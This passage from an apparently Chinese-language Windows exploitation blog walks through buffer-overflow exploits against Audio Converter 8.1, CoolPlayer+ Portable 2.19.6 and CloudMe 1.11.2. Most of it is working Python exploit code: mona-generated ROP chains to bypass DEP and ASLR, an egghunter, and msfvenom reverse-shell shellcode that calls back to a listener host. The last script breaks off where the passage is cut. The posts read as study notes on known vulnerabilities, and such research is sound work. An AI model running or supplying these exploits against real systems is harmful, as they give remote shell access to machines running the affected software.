class="number">0x10001a43</span>, <span class="comment"># POP ESI # RETN [audconv.dll] </span></span><br><span class="line"> <span class="number">0x1006685a</span>, <span class="comment"># JMP [EAX] [audconv.dll]</span></span><br><span class="line"> <span class="number">0x1008264a</span>, <span class="comment"># POP EAX # RETN [audconv.dll] </span></span><br><span class="line"> <span class="number">0x100952c4</span>, <span class="comment"># ptr to &VirtualAlloc() [IAT audconv.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:pushad:---]</span></span><br><span class="line"> <span class="number">0x1002ef14</span>, <span class="comment"># PUSHAD # RETN [audconv.dll] </span></span><br><span class="line"> <span class="comment">#[---INFO:extras:---]</span></span><br><span class="line"> <span class="number">0x1002debd</span>, <span class="comment"># ptr to 'push esp # ret ' [audconv.dll]</span></span><br><span class="line"> ]</span><br><span class="line"> <span class="keyword">return</span> <span class="string">b''</span>.join(struct.pack(<span class="string">'<I'</span>, _) <span class="keyword">for</span> _ <span class="keyword">in</span> rop_gadgets)</span><br><span class="line"></span><br><span class="line">rop_chain = create_rop_chain()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">nops1 = <span class="string">b"\x90"</span>*<span class="number">32</span></span><br><span class="line">junk1 = <span class="string">b"A"</span>*<span class="number">32</span></span><br><span class="line">nops2 = <span class="string">b"\x90"</span>*(<span class="number">1240</span>+<span class="number">108</span>) <span class="comment">#</span></span><br><span class="line">payload = nops2+rop_chain+nops1+shellcode</span><br><span class="line">junk2 = <span class="string">b"A"</span>*(<span class="number">4436</span>-len(payload)<span 
class="number">-32</span>)</span><br><span class="line"><span class="comment"># seh = b"\xcc\xcc\xcc\xcc"</span></span><br><span class="line">seh = struct.pack(<span class="string">"<L"</span>,<span class="number">0x100646bb</span>) <span class="comment"># ADD ESP,0E44 # RETN</span></span><br><span class="line">junk3 = <span class="string">b"C"</span>*(<span class="number">45544</span><span class="number">-4432</span><span class="number">-4</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> open(filename, <span class="string">"wb"</span>) <span class="keyword">as</span> fp:</span><br><span class="line"> fp.write(junk1+payload+junk2+seh+junk3)</span><br></pre></td></tr></table></figure>
<p>成功反弹<code>shell</code>:</p>
<p><img src="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/03.png" alt="BOF"></p>
<p>再来看一下<code>win10</code>(不开启<code>DEP</code>)。溢出时,可以看到<code>SEH</code>链的第二项被我们覆盖了:</p>
<p><img src="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/09.png" alt="BOF"></p>
<p>在异常处理时出现了如下问题(会一直停留在第一个异常处理函数里面,无法跳出):</p>
<p><img src="/2022/05/12/Audio-Converter-8-1-SEH-Stack-Buffer-Overflow-DEP-and-ASLR-bypass/10.png" alt="BOF"></p>
<p>谷歌了一下,说是异常没有捕获到。这里就不进一步讨论了。</p>
<p><strong>2022年5月14日更新:</strong>Win10利用失败的原因是:我想找一个关闭了<code>SafeSEH</code>且未开启<code>ASLR</code>的<code>DLL</code>,这样才能保证利用脚本是稳定的,不会因为系统重启而失效。满足条件的有且仅有<code>audconv.dll</code>,而在Win10下它的地址(见上面使用的地址)以<code>00</code>开头,地址中的<code>00</code>字节会截断后续输入;而开头<code>Win7</code>部分里,<code>audconv.dll</code>的地址空间不是以<code>00</code>开头,所以可以利用成功。</p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="https://n0maj1o24.github.io/2022/05/10/CoolPlayer-Portable-2-19-6-m3u-File-Stack-Overflow-Egghunter-ASLR-Bypass/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.jpeg">
<meta itemprop="name" content="n0maj1o24">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Technical Memorandum">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2022/05/10/CoolPlayer-Portable-2-19-6-m3u-File-Stack-Overflow-Egghunter-ASLR-Bypass/" class="post-title-link" itemprop="url">CoolPlayer+ Portable 2.19.6 - '.m3u' File Stack Overflow:Egghunter+ASLR Bypass</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2022-05-09 21:35:07" itemprop="dateCreated datePublished" datetime="2022-05-09T21:35:07Z">2022-05-09</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar-check"></i>
</span>
<span class="post-meta-item-text">更新于</span>
<time title="修改时间:2022-05-12 15:30:02" itemprop="dateModified" datetime="2022-05-12T15:30:02Z">2022-05-12</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-folder"></i>
</span>
<span class="post-meta-item-text">分类于</span>
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
<a href="/categories/Windows-Exploitation/" itemprop="url" rel="index"><span itemprop="name">Windows Exploitation</span></a>
</span>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p>测试环境:<code>Windows 10 21H2 32</code>位,关闭全局<code>DEP</code>。最开始是想开启全局<code>DEP</code>,然后尝试<code>Egghunter+Bypass DEP+Bypass ASLR</code>,后来发现不可行,就把全局<code>DEP</code>关掉了。</p>
<p><code>exploit-db</code>上的链接:<a href="https://www.exploit-db.com/exploits/40151" target="_blank" rel="noopener">https://www.exploit-db.com/exploits/40151</a>。</p>
<p>基本操作没有太多有意思的点,就不阐述了。我选择的缓冲区大小为<code>2000</code>字节,<code>Offset</code>确定为<code>212</code>,坏字符为<code>\x00\x0a\x0d</code>。</p>
<p><code>mona</code>看一下未开启<code>ASLR</code>的模块:</p>
<p><img src="/2022/05/10/CoolPlayer-Portable-2-19-6-m3u-File-Stack-Overflow-Egghunter-ASLR-Bypass/01.png" alt="bof"></p>
<p>只有<code>coolplayer+.exe</code>本身,并且地址区间在<code>0x00400000</code>到<code>0x00485000</code>之间。好了,问题来了:地址包含<code>00</code>,会截断后续的字符,而我们如果需要<code>Bypass ASLR</code>的话,又只能使用这里的某个地址。为了更直观地获取寄存器与我们输入的字符串之间的关系,来检查查找坏字符时的内存情况:</p>
<p><img src="/2022/05/10/CoolPlayer-Portable-2-19-6-m3u-File-Stack-Overflow-Egghunter-ASLR-Bypass/01.png" alt="bof"></p>
<p>也就是说,<code>EBX</code>所指向的内存保存着我们输入的字符串,按照一般的栈溢出思路,只需把<code>EIP</code>覆盖为一条类似<code>JMP EBX</code>的指令的地址即可。</p>
<p><img src="/2022/05/10/CoolPlayer-Portable-2-19-6-m3u-File-Stack-Overflow-Egghunter-ASLR-Bypass/03.png" alt="bof"></p>
<p>直接贴上最终的利用代码来分析:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span 
class="keyword">import</span> struct</span><br><span class="line"></span><br><span class="line">filename=<span class="string">"exploit.m3u"</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># msfvenom -p windows/shell_reverse_tcp LHOST=192.168.91.137 LPORT=4444 EXITFUNC=thread -f python -v shellcode -b '\x00\x0a\x0d'</span></span><br><span class="line"></span><br><span class="line">shellcode = <span class="string">b"w00tw00t"</span></span><br><span class="line">shellcode += <span class="string">b"\xba\x75\xb8\x3a\xf7\xd9\xc4\xd9\x74\x24\xf4"</span></span><br><span class="line">shellcode += <span class="string">b"\x58\x33\xc9\xb1\x52\x83\xc0\x04\x31\x50\x0e"</span></span><br><span class="line">shellcode += <span class="string">b"\x03\x25\xb6\xd8\x02\x39\x2e\x9e\xed\xc1\xaf"</span></span><br><span class="line">shellcode += <span class="string">b"\xff\x64\x24\x9e\x3f\x12\x2d\xb1\x8f\x50\x63"</span></span><br><span class="line">shellcode += <span class="string">b"\x3e\x7b\x34\x97\xb5\x09\x91\x98\x7e\xa7\xc7"</span></span><br><span class="line">shellcode += <span class="string">b"\x97\x7f\x94\x34\xb6\x03\xe7\x68\x18\x3d\x28"</span></span><br><span class="line">shellcode += <span class="string">b"\x7d\x59\x7a\x55\x8c\x0b\xd3\x11\x23\xbb\x50"</span></span><br><span class="line">shellcode += <span class="string">b"\x6f\xf8\x30\x2a\x61\x78\xa5\xfb\x80\xa9\x78"</span></span><br><span class="line">shellcode += <span class="string">b"\x77\xdb\x69\x7b\x54\x57\x20\x63\xb9\x52\xfa"</span></span><br><span class="line">shellcode += <span class="string">b"\x18\x09\x28\xfd\xc8\x43\xd1\x52\x35\x6c\x20"</span></span><br><span class="line">shellcode += <span class="string">b"\xaa\x72\x4b\xdb\xd9\x8a\xaf\x66\xda\x49\xcd"</span></span><br><span class="line">shellcode += <span class="string">b"\xbc\x6f\x49\x75\x36\xd7\xb5\x87\x9b\x8e\x3e"</span></span><br><span class="line">shellcode += <span 
class="string">b"\x8b\x50\xc4\x18\x88\x67\x09\x13\xb4\xec\xac"</span></span><br><span class="line">shellcode += <span class="string">b"\xf3\x3c\xb6\x8a\xd7\x65\x6c\xb2\x4e\xc0\xc3"</span></span><br><span class="line">shellcode += <span class="string">b"\xcb\x90\xab\xbc\x69\xdb\x46\xa8\x03\x86\x0e"</span></span><br><span class="line">shellcode += <span class="string">b"\x1d\x2e\x38\xcf\x09\x39\x4b\xfd\x96\x91\xc3"</span></span><br><span class="line">shellcode += <span class="string">b"\x4d\x5e\x3c\x14\xb1\x75\xf8\x8a\x4c\x76\xf9"</span></span><br><span class="line">shellcode += <span class="string">b"\x83\x8a\x22\xa9\xbb\x3b\x4b\x22\x3b\xc3\x9e"</span></span><br><span class="line">shellcode += <span class="string">b"\xe5\x6b\x6b\x71\x46\xdb\xcb\x21\x2e\x31\xc4"</span></span><br><span class="line">shellcode += <span class="string">b"\x1e\x4e\x3a\x0e\x37\xe5\xc1\xd9\xf8\x52\x92"</span></span><br><span class="line">shellcode += <span class="string">b"\x90\x91\xa0\x24\xb2\x3d\x2c\xc2\xde\xad\x78"</span></span><br><span class="line">shellcode += <span class="string">b"\x5d\x77\x57\x21\x15\xe6\x98\xff\x50\x28\x12"</span></span><br><span class="line">shellcode += <span class="string">b"\x0c\xa5\xe7\xd3\x79\xb5\x90\x13\x34\xe7\x37"</span></span><br><span class="line">shellcode += <span class="string">b"\x2b\xe2\x8f\xd4\xbe\x69\x4f\x92\xa2\x25\x18"</span></span><br><span class="line">shellcode += <span class="string">b"\xf3\x15\x3c\xcc\xe9\x0c\x96\xf2\xf3\xc9\xd1"</span></span><br><span class="line">shellcode += <span class="string">b"\xb6\x2f\x2a\xdf\x37\xbd\x16\xfb\x27\x7b\x96"</span></span><br><span class="line">shellcode += <span class="string">b"\x47\x13\xd3\xc1\x11\xcd\x95\xbb\xd3\xa7\x4f"</span></span><br><span class="line">shellcode += <span class="string">b"\x17\xba\x2f\x09\x5b\x7d\x29\x16\xb6\x0b\xd5"</span></span><br><span class="line">shellcode += <span class="string">b"\xa7\x6f\x4a\xea\x08\xf8\x5a\x93\x74\x98\xa5"</span></span><br><span class="line">shellcode += 
<span class="string">b"\x4e\x3d\xb8\x47\x5a\x48\x51\xde\x0f\xf1\x3c"</span></span><br><span class="line">shellcode += <span class="string">b"\xe1\xfa\x36\x39\x62\x0e\xc7\xbe\x7a\x7b\xc2"</span></span><br><span class="line">shellcode += <span class="string">b"\xfb\x3c\x90\xbe\x94\xa8\x96\x6d\x94\xf8"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">buff_size = <span class="number">2000</span></span><br><span class="line"><span class="comment">#egghunter = b"\x66\x81\xca\xff\x0f\x42\x52\xb8\x38\xfe\xff\xff\xf7\xd8\xcd\x2e\x3c\x05\x5a\x74\xeb\xb8\x77\x30\x30\x74\x89\xd7\xaf\x75\xe6\xaf\x75\xe3\xff\xe7"</span></span><br><span class="line">egghunter = <span class="string">b"\x66\x81\xca\xff\x0f\x42\x52\x31\xc0\x66\x05\xc8\x01\xcd\x2e\x3c\x05\x5a\x74\xec\xb8\x77\x30\x30\x74\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"</span></span><br><span class="line">junk = <span class="string">b'\x90'</span>*(<span class="number">212</span>-len(egghunter))</span><br><span class="line">eip = struct.pack(<span class="string">"<L"</span>,<span class="number">0x00401897</span>) <span class="comment"># 0x00401897 : call ebx</span></span><br><span class="line">nops = <span class="string">b"\x90"</span>*<span class="number">32</span></span><br><span class="line">junk2 = <span class="string">b'C'</span>*(buff_size<span class="number">-212</span><span class="number">-4</span>-len(shellcode)<span class="number">-32</span>)</span><br><span class="line">payload = junk+egghunter+eip+nops+shellcode+junk2</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> open(filename,<span class="string">"wb"</span>) <span class="keyword">as</span> filehander:</span><br><span class="line"> filehander.write(payload)</span><br></pre></td></tr></table></figure>
<p>这里选择<code>0x00401897</code>(<code>call ebx</code>)用于覆盖<code>EIP</code>。</p>
<p><img src="/2022/05/10/CoolPlayer-Portable-2-19-6-m3u-File-Stack-Overflow-Egghunter-ASLR-Bypass/04.png" alt="bof"></p>
<p>可以发现<code>EIP</code>之后的内容都变了(我在<code>EIP</code>之后放的是<code>\x90</code>)。来看看此刻<code>EBX</code>所指向的内存的值:</p>
<p><img src="/2022/05/10/CoolPlayer-Portable-2-19-6-m3u-File-Stack-Overflow-Egghunter-ASLR-Bypass/05.png" alt="bof"></p>
<p>可以看到<code>EBX</code>所指向的内容就是我们输入的内容,并且没有被截断。最开始想把<code>shellcode</code>放在导致溢出的<code>A</code>字符串所在的位置,但这里的空间太小,放不下完整的<code>shellcode</code>,只能考虑放<code>egghunter</code>代码。</p>
<p>成功反弹<code>shell</code>:(因为涉及到内存的搜索,反弹<code>shell</code>需要等待一些时间)</p>
<p><img src="/2022/05/10/CoolPlayer-Portable-2-19-6-m3u-File-Stack-Overflow-Egghunter-ASLR-Bypass/06.png" alt="bof"></p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="https://n0maj1o24.github.io/2022/05/08/CloudMe-v1-11-2-DEP-bypass-using-ROP-gadgets/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.jpeg">
<meta itemprop="name" content="n0maj1o24">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Technical Memorandum">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2022/05/08/CloudMe-v1-11-2-DEP-bypass-using-ROP-gadgets/" class="post-title-link" itemprop="url">CloudMe v1.11.2 DEP and ASLR bypass using ROP gadgets</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2022-05-08 15:56:36" itemprop="dateCreated datePublished" datetime="2022-05-08T15:56:36Z">2022-05-08</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar-check"></i>
</span>
<span class="post-meta-item-text">更新于</span>
<time title="修改时间:2022-05-12 15:30:01" itemprop="dateModified" datetime="2022-05-12T15:30:01Z">2022-05-12</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-folder"></i>
</span>
<span class="post-meta-item-text">分类于</span>
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
<a href="/categories/Windows-Exploitation/" itemprop="url" rel="index"><span itemprop="name">Windows Exploitation</span></a>
</span>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-comment"></i>
</span>
<span class="post-meta-item-text">Valine:</span>
<a title="valine" href="/2022/05/08/CloudMe-v1-11-2-DEP-bypass-using-ROP-gadgets/#valine-comments" itemprop="discussionUrl">
<span class="post-comments-count valine-comment-count" data-xid="/2022/05/08/CloudMe-v1-11-2-DEP-bypass-using-ROP-gadgets/" itemprop="commentCount"></span>
</a>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p>测试环境:<code>Windows 10 21H2 32</code>位,开启全局<code>DEP</code>。这里来看如何绕过<code>DEP</code>和<code>ASLR</code>。附带演示一下基于<code>SEH</code>栈溢出的<code>DEP bypass</code>与普通<code>SEH</code>栈溢出在利用代码结构上的不同。</p>
<p><strong>普通栈溢出利用:</strong></p>
<p>这个程序可以用普通的栈溢出<code>DEP bypass</code>来完成利用。此时覆盖返回地址的<code>Offset</code>为<code>1052</code>。太简单了,就不过多解释了。</p>
<p>查找未开启<code>ASLR</code>的<code>DLL</code>,并查找<code>RETN</code>:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">0:014> .load pykd.pyd</span><br><span class="line">0:014> !py mona noaslr</span><br></pre></td></tr></table></figure>
<p><img src="/2022/05/08/CloudMe-v1-11-2-DEP-bypass-using-ROP-gadgets/02.png" alt="seh"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0:014> !py mona find -<span class="built_in">type</span> instr -s <span class="string">"retn"</span> -p 10 -o -m Qt5Core.dll</span><br></pre></td></tr></table></figure>
<p><img src="/2022/05/08/CloudMe-v1-11-2-DEP-bypass-using-ROP-gadgets/03.png" alt="seh"></p>
<p>来看一下最终的利用代码:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"></span><br><span class="line">target=<span class="string">"127.0.0.1"</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># msfvenom -p windows/shell_reverse_tcp LHOST=192.168.13.137 LPORT=4444 EXITFUNC=thread -f python -v shellcode -b '\x00'</span></span><br><span class="line"></span><br><span class="line">shellcode = 
<span class="string">b""</span></span><br><span class="line">shellcode += <span class="string">b"\xb8\x26\xe9\x79\xbf\xdb\xdc\xd9\x74\x24\xf4"</span></span><br><span class="line">shellcode += <span class="string">b"\x5e\x33\xc9\xb1\x52\x31\x46\x12\x83\xee\xfc"</span></span><br><span class="line">shellcode += <span class="string">b"\x03\x60\xe7\x9b\x4a\x90\x1f\xd9\xb5\x68\xe0"</span></span><br><span class="line">shellcode += <span class="string">b"\xbe\x3c\x8d\xd1\xfe\x5b\xc6\x42\xcf\x28\x8a"</span></span><br><span class="line">shellcode += <span class="string">b"\x6e\xa4\x7d\x3e\xe4\xc8\xa9\x31\x4d\x66\x8c"</span></span><br><span class="line">shellcode += <span class="string">b"\x7c\x4e\xdb\xec\x1f\xcc\x26\x21\xff\xed\xe8"</span></span><br><span class="line">shellcode += <span class="string">b"\x34\xfe\x2a\x14\xb4\x52\xe2\x52\x6b\x42\x87"</span></span><br><span class="line">shellcode += <span class="string">b"\x2f\xb0\xe9\xdb\xbe\xb0\x0e\xab\xc1\x91\x81"</span></span><br><span class="line">shellcode += <span class="string">b"\xa7\x9b\x31\x20\x6b\x90\x7b\x3a\x68\x9d\x32"</span></span><br><span class="line">shellcode += <span class="string">b"\xb1\x5a\x69\xc5\x13\x93\x92\x6a\x5a\x1b\x61"</span></span><br><span class="line">shellcode += <span class="string">b"\x72\x9b\x9c\x9a\x01\xd5\xde\x27\x12\x22\x9c"</span></span><br><span class="line">shellcode += <span class="string">b"\xf3\x97\xb0\x06\x77\x0f\x1c\xb6\x54\xd6\xd7"</span></span><br><span class="line">shellcode += <span class="string">b"\xb4\x11\x9c\xbf\xd8\xa4\x71\xb4\xe5\x2d\x74"</span></span><br><span class="line">shellcode += <span class="string">b"\x1a\x6c\x75\x53\xbe\x34\x2d\xfa\xe7\x90\x80"</span></span><br><span class="line">shellcode += <span class="string">b"\x03\xf7\x7a\x7c\xa6\x7c\x96\x69\xdb\xdf\xff"</span></span><br><span class="line">shellcode += <span class="string">b"\x5e\xd6\xdf\xff\xc8\x61\xac\xcd\x57\xda\x3a"</span></span><br><span class="line">shellcode += <span 
class="string">b"\x7e\x1f\xc4\xbd\x81\x0a\xb0\x51\x7c\xb5\xc1"</span></span><br><span class="line">shellcode += <span class="string">b"\x78\xbb\xe1\x91\x12\x6a\x8a\x79\xe2\x93\x5f"</span></span><br><span class="line">shellcode += <span class="string">b"\x2d\xb2\x3b\x30\x8e\x62\xfc\xe0\x66\x68\xf3"</span></span><br><span class="line">shellcode += <span class="string">b"\xdf\x97\x93\xd9\x77\x3d\x6e\x8a\xb7\x6a\x7d"</span></span><br><span class="line">shellcode += <span class="string">b"\xc3\x50\x69\x7d\xc2\xfc\xe4\x9b\x8e\xec\xa0"</span></span><br><span class="line">shellcode += <span class="string">b"\x34\x27\x94\xe8\xce\xd6\x59\x27\xab\xd9\xd2"</span></span><br><span class="line">shellcode += <span class="string">b"\xc4\x4c\x97\x12\xa0\x5e\x40\xd3\xff\x3c\xc7"</span></span><br><span class="line">shellcode += <span class="string">b"\xec\xd5\x28\x8b\x7f\xb2\xa8\xc2\x63\x6d\xff"</span></span><br><span class="line">shellcode += <span class="string">b"\x83\x52\x64\x95\x39\xcc\xde\x8b\xc3\x88\x19"</span></span><br><span class="line">shellcode += <span class="string">b"\x0f\x18\x69\xa7\x8e\xed\xd5\x83\x80\x2b\xd5"</span></span><br><span class="line">shellcode += <span class="string">b"\x8f\xf4\xe3\x80\x59\xa2\x45\x7b\x28\x1c\x1c"</span></span><br><span class="line">shellcode += <span class="string">b"\xd0\xe2\xc8\xd9\x1a\x35\x8e\xe5\x76\xc3\x6e"</span></span><br><span class="line">shellcode += <span class="string">b"\x57\x2f\x92\x91\x58\xa7\x12\xea\x84\x57\xdc"</span></span><br><span class="line">shellcode += <span class="string">b"\x21\x0d\x77\x3f\xe3\x78\x10\xe6\x66\xc1\x7d"</span></span><br><span class="line">shellcode += <span class="string">b"\x19\x5d\x06\x78\x9a\x57\xf7\x7f\x82\x12\xf2"</span></span><br><span class="line">shellcode += <span class="string">b"\xc4\x04\xcf\x8e\x55\xe1\xef\x3d\x55\x20"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span 
class="title">create_rop_chain</span><span class="params">()</span>:</span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># rop chain generated with mona.py - www.corelan.be</span></span><br><span class="line"> rop_gadgets = [</span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_ebp:---]</span></span><br><span class="line"> <span class="number">0x68c50d64</span>, <span class="comment"># POP EBP # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x68c50d64</span>, <span class="comment"># skip 4 bytes [Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_ebx:---]</span></span><br><span class="line"> <span class="number">0x68fa7ca2</span>, <span class="comment"># POP EDX # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0xfffffdff</span>, <span class="comment"># Value to negate, will become 0x00000201</span></span><br><span class="line"> <span class="number">0x68bd5fe4</span>, <span class="comment"># NEG EDX # RETN 0x0C [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x68d773fe</span>, <span class="comment"># POP EBX # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span class="comment"># Filler (RETN offset compensation)</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span class="comment"># Filler (RETN offset compensation)</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span class="comment"># Filler (RETN offset compensation)</span></span><br><span class="line"> <span class="number">0xffffffff</span>, <span class="comment">#</span></span><br><span class="line"> <span class="number">0x68fb3ef1</span>, <span class="comment"># INC EBX # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x68f8063c</span>, <span class="comment"># ADD EBX,EDX # ADD AL,0A # 
RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_edx:---]</span></span><br><span class="line"> <span class="number">0x68f9a472</span>, <span class="comment"># POP EDX # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0xffffffc0</span>, <span class="comment"># Value to negate, will become 0x00000040</span></span><br><span class="line"> <span class="number">0x68bd5fe4</span>, <span class="comment"># NEG EDX # RETN 0x0C [Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_ecx:---]</span></span><br><span class="line"> <span class="number">0x68ae7e17</span>, <span class="comment"># POP ECX # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span class="comment"># Filler (RETN offset compensation)</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span class="comment"># Filler (RETN offset compensation)</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span class="comment"># Filler (RETN offset compensation)</span></span><br><span class="line"> <span class="number">0x68c13baa</span>, <span class="comment"># &Writable location [Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_edi:---]</span></span><br><span class="line"> <span class="number">0x68c018b6</span>, <span class="comment"># POP EDI # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x68cef5b4</span>, <span class="comment"># RETN (ROP NOP) [Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_esi:---]</span></span><br><span class="line"> <span class="number">0x68d54786</span>, <span class="comment"># POP ESI # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x68a9314e</span>, <span class="comment"># JMP [EAX] 
